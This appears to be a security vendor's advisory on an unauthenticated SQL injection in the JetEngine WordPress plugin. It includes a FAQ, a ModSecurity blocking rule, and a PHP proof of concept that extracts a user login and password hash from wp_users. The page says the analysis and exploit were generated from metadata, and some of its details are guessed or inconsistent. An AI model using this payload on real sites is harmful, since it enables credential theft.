What is CVE-2026-4352?

CVE-2026-4352 is a high severity SQL injection vulnerability found in the JetEngine plugin for WordPress. It allows unauthenticated attackers to inject arbitrary SQL commands through the ‘_cct_search’ parameter in the Custom Content Type REST API endpoint.

How does the SQL injection work?

The vulnerability arises because the ‘_cct_search’ parameter is directly interpolated into a SQL query using sprintf() without proper sanitization. This allows attackers to manipulate the SQL query and potentially extract sensitive data from the database.

Who is affected by this vulnerability?

Any WordPress site using JetEngine version 3.8.6.1 or earlier is at risk, provided the Custom Content Types module is enabled with at least one public REST GET endpoint configured. Administrators should check their JetEngine version to determine if they are affected.

How can I check if my site is vulnerable?

To check for vulnerability, verify that you are using JetEngine version 3.8.6.1 or earlier and ensure that the Custom Content Types module is active. Additionally, confirm that at least one CCT is configured with a public REST GET endpoint.

What is the CVSS score and what does it indicate?

The CVSS score for CVE-2026-4352 is 7.5, indicating a high severity level. This score reflects the potential impact on confidentiality, as attackers can exploit this vulnerability to access sensitive information without authentication.

How can I mitigate this vulnerability?

To mitigate this vulnerability, update the JetEngine plugin to version 3.8.6.2 or later, where the issue has been addressed. Additionally, review and implement secure coding practices to prevent similar vulnerabilities in the future.

What does the proof of concept demonstrate?

The proof of concept shows how an attacker can craft a malicious request to the vulnerable REST API endpoint, exploiting the SQL injection flaw to extract user credentials from the database. It illustrates the practical implications of the vulnerability.

What data could an attacker access through this vulnerability?

An attacker exploiting this vulnerability could access sensitive information such as user login credentials, hashed passwords, and other personal data stored in the WordPress database, depending on the database permissions.

What are the implications of a successful exploit?

Successful exploitation could lead to unauthorized access to sensitive data, including user credentials and private content. This could potentially allow attackers to take over accounts or compromise the entire WordPress site.

What is the role of the Custom Content Types module?

The Custom Content Types module must be enabled for the vulnerability to be exploitable. This module allows for the configuration of public REST GET endpoints, which are the targets for the SQL injection attack.

How does this vulnerability relate to SQL injection best practices?

CVE-2026-4352 highlights the critical importance of using prepared statements and proper sanitization when constructing SQL queries. Following secure coding practices can prevent such vulnerabilities and protect applications from SQL injection attacks.

Is there a way to test for this vulnerability without exploiting it?

While testing for vulnerabilities should be done carefully, administrators can review their code and configurations for the use of unsanitized user inputs in SQL queries. Security plugins or tools may also provide vulnerability scanning features.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : April 17, 2026

CVE-2026-4352: JetEngine <= 3.8.6.1 – Unauthenticated SQL Injection via '_cct_search' Parameter (jet-engine)

CVE ID CVE-2026-4352

Plugin jet-engine

Severity High (CVSS 7.5)

CWE 89

Vulnerable Version 3.8.6.1

Patched Version —

Disclosed April 12, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-4352 (metadata-based):
This vulnerability is an unauthenticated SQL injection in the JetEngine WordPress plugin, affecting versions up to and including 3.8.6.1. The flaw resides in the plugin’s Custom Content Type (CCT) REST API search endpoint. Attackers can inject arbitrary SQL commands via the `_cct_search` GET parameter, potentially leading to full database disclosure. The CVSS score of 7.5 (High) reflects its network-based attack vector, low attack complexity, and high impact on confidentiality.

Atomic Edge research infers the root cause is improper SQL query construction. The vulnerability description states the `_cct_search` parameter is interpolated directly into a SQL query string using `sprintf()` without sanitization or the use of `$wpdb->prepare()`. This is a classic SQL injection pattern (CWE-89). The WordPress REST API’s automatic `wp_unslash()` call on `$_GET` data strips the protection from `wp_magic_quotes()`, enabling single-quote-based injection. This analysis is inferred from the CWE and public description, as the source code diff is unavailable for confirmation.

Exploitation requires the CCT module to be enabled with at least one public REST GET endpoint configured. Attackers target the specific REST API endpoint for the custom content type, likely following a pattern like `/wp-json/jet-engine/v1/{cct_slug}/`. They append the `_cct_search` parameter with a malicious SQL payload, such as `’ UNION SELECT user_login,user_pass FROM wp_users– -`. This payload would be concatenated into an existing SQL query, allowing data extraction from other database tables.

The fix likely involved replacing the insecure `sprintf()` interpolation with a parameterized query using `$wpdb->prepare()`. Proper remediation requires ensuring all user-supplied data passed to SQL statements is properly escaped or, preferably, using prepared statements. The patched version 3.8.6.2 presumably implements these secure coding practices for the CCT search functionality.

Successful exploitation allows unauthenticated attackers to extract sensitive information from the WordPress database. This includes user credentials (hashed passwords), personally identifiable information, private posts, and any other data stored in tables accessible to the WordPress database user. While the CVSS vector indicates no direct impact on integrity or availability, the compromise of administrative credentials could lead to full site takeover and further attacks.

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

SecRule REQUEST_URI "@rx ^/wp-json/jet-engine/vd+/[^/]+/" 
  "id:20264352,phase:2,deny,status:403,chain,msg:'CVE-2026-4352 via JetEngine REST API',severity:'CRITICAL',tag:'CVE-2026-4352'"
  SecRule REQUEST_METHOD "@streq GET" "chain"
    SecRule ARGS_GET:_cct_search "@detectSQLi" "t:none"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-4352 - JetEngine <= 3.8.6.1 - Unauthenticated SQL Injection via '_cct_search' Parameter
<?php

$target_url = 'https://example.com'; // CHANGE THIS

// Assumptions based on vulnerability description:
// 1. The JetEngine plugin is installed with version <= 3.8.6.1.
// 2. The Custom Content Types module is enabled.
// 3. At least one CCT is configured with a public REST GET endpoint.
// 4. The REST endpoint path follows WordPress REST API conventions.
// We attempt to discover the endpoint by probing a common CCT slug.
$cct_slug = 'items'; // Common default slug; attacker may need to enumerate.
$rest_path = "/wp-json/jet-engine/v1/$cct_slug/";

// SQL Injection payload to extract the first username and password hash from wp_users.
// The payload closes the original query's string and unions with a data extraction query.
$payload = "' UNION SELECT user_login,user_pass FROM wp_users LIMIT 1-- -";
$full_url = $target_url . $rest_path . '?_cct_search=' . urlencode($payload);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $full_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
// The endpoint is public and unauthenticated, so no cookies or headers are needed.
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); // For testing only
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);

$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

if ($http_code == 200) {
    echo "Request sent to: $full_urln";
    echo "HTTP Response Code: $http_coden";
    echo "Response (first 500 chars): " . substr($response, 0, 500) . "n";
    // A successful injection may return database data within the JSON response.
    // The exact structure of the exploitable response depends on the plugin's REST output.
} else {
    echo "Request failed or endpoint not found. HTTP Code: $http_coden";
    echo "The target may not have a vulnerable CCT endpoint at the guessed slug '$cct_slug'.n";
    echo "An attacker would need to enumerate valid CCT slugs.n";
}

?>

Frequently Asked Questions

What is CVE-2026-4352?
Overview of the vulnerability
CVE-2026-4352 is a high severity SQL injection vulnerability found in the JetEngine plugin for WordPress. It allows unauthenticated attackers to inject arbitrary SQL commands through the ‘_cct_search’ parameter in the Custom Content Type REST API endpoint.
How does the SQL injection work?
Mechanism of exploitation
The vulnerability arises because the ‘_cct_search’ parameter is directly interpolated into a SQL query using sprintf() without proper sanitization. This allows attackers to manipulate the SQL query and potentially extract sensitive data from the database.
Who is affected by this vulnerability?
Identifying vulnerable installations
Any WordPress site using JetEngine version 3.8.6.1 or earlier is at risk, provided the Custom Content Types module is enabled with at least one public REST GET endpoint configured. Administrators should check their JetEngine version to determine if they are affected.
How can I check if my site is vulnerable?
Steps for verification
To check for vulnerability, verify that you are using JetEngine version 3.8.6.1 or earlier and ensure that the Custom Content Types module is active. Additionally, confirm that at least one CCT is configured with a public REST GET endpoint.
What is the CVSS score and what does it indicate?
Understanding the severity rating
The CVSS score for CVE-2026-4352 is 7.5, indicating a high severity level. This score reflects the potential impact on confidentiality, as attackers can exploit this vulnerability to access sensitive information without authentication.
How can I mitigate this vulnerability?
Recommended actions
To mitigate this vulnerability, update the JetEngine plugin to version 3.8.6.2 or later, where the issue has been addressed. Additionally, review and implement secure coding practices to prevent similar vulnerabilities in the future.
What does the proof of concept demonstrate?
Illustrating the vulnerability
The proof of concept shows how an attacker can craft a malicious request to the vulnerable REST API endpoint, exploiting the SQL injection flaw to extract user credentials from the database. It illustrates the practical implications of the vulnerability.
What data could an attacker access through this vulnerability?
Potential data exposure
An attacker exploiting this vulnerability could access sensitive information such as user login credentials, hashed passwords, and other personal data stored in the WordPress database, depending on the database permissions.
What are the implications of a successful exploit?
Consequences of exploitation
Successful exploitation could lead to unauthorized access to sensitive data, including user credentials and private content. This could potentially allow attackers to take over accounts or compromise the entire WordPress site.
What is the role of the Custom Content Types module?
Importance in the vulnerability
The Custom Content Types module must be enabled for the vulnerability to be exploitable. This module allows for the configuration of public REST GET endpoints, which are the targets for the SQL injection attack.
How does this vulnerability relate to SQL injection best practices?
Importance of secure coding
CVE-2026-4352 highlights the critical importance of using prepared statements and proper sanitization when constructing SQL queries. Following secure coding practices can prevent such vulnerabilities and protect applications from SQL injection attacks.
Is there a way to test for this vulnerability without exploiting it?
Safe testing methods
While testing for vulnerabilities should be done carefully, administrators can review their code and configurations for the use of unsanitized user inputs in SQL queries. Security plugins or tools may also provide vulnerability scanning features.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations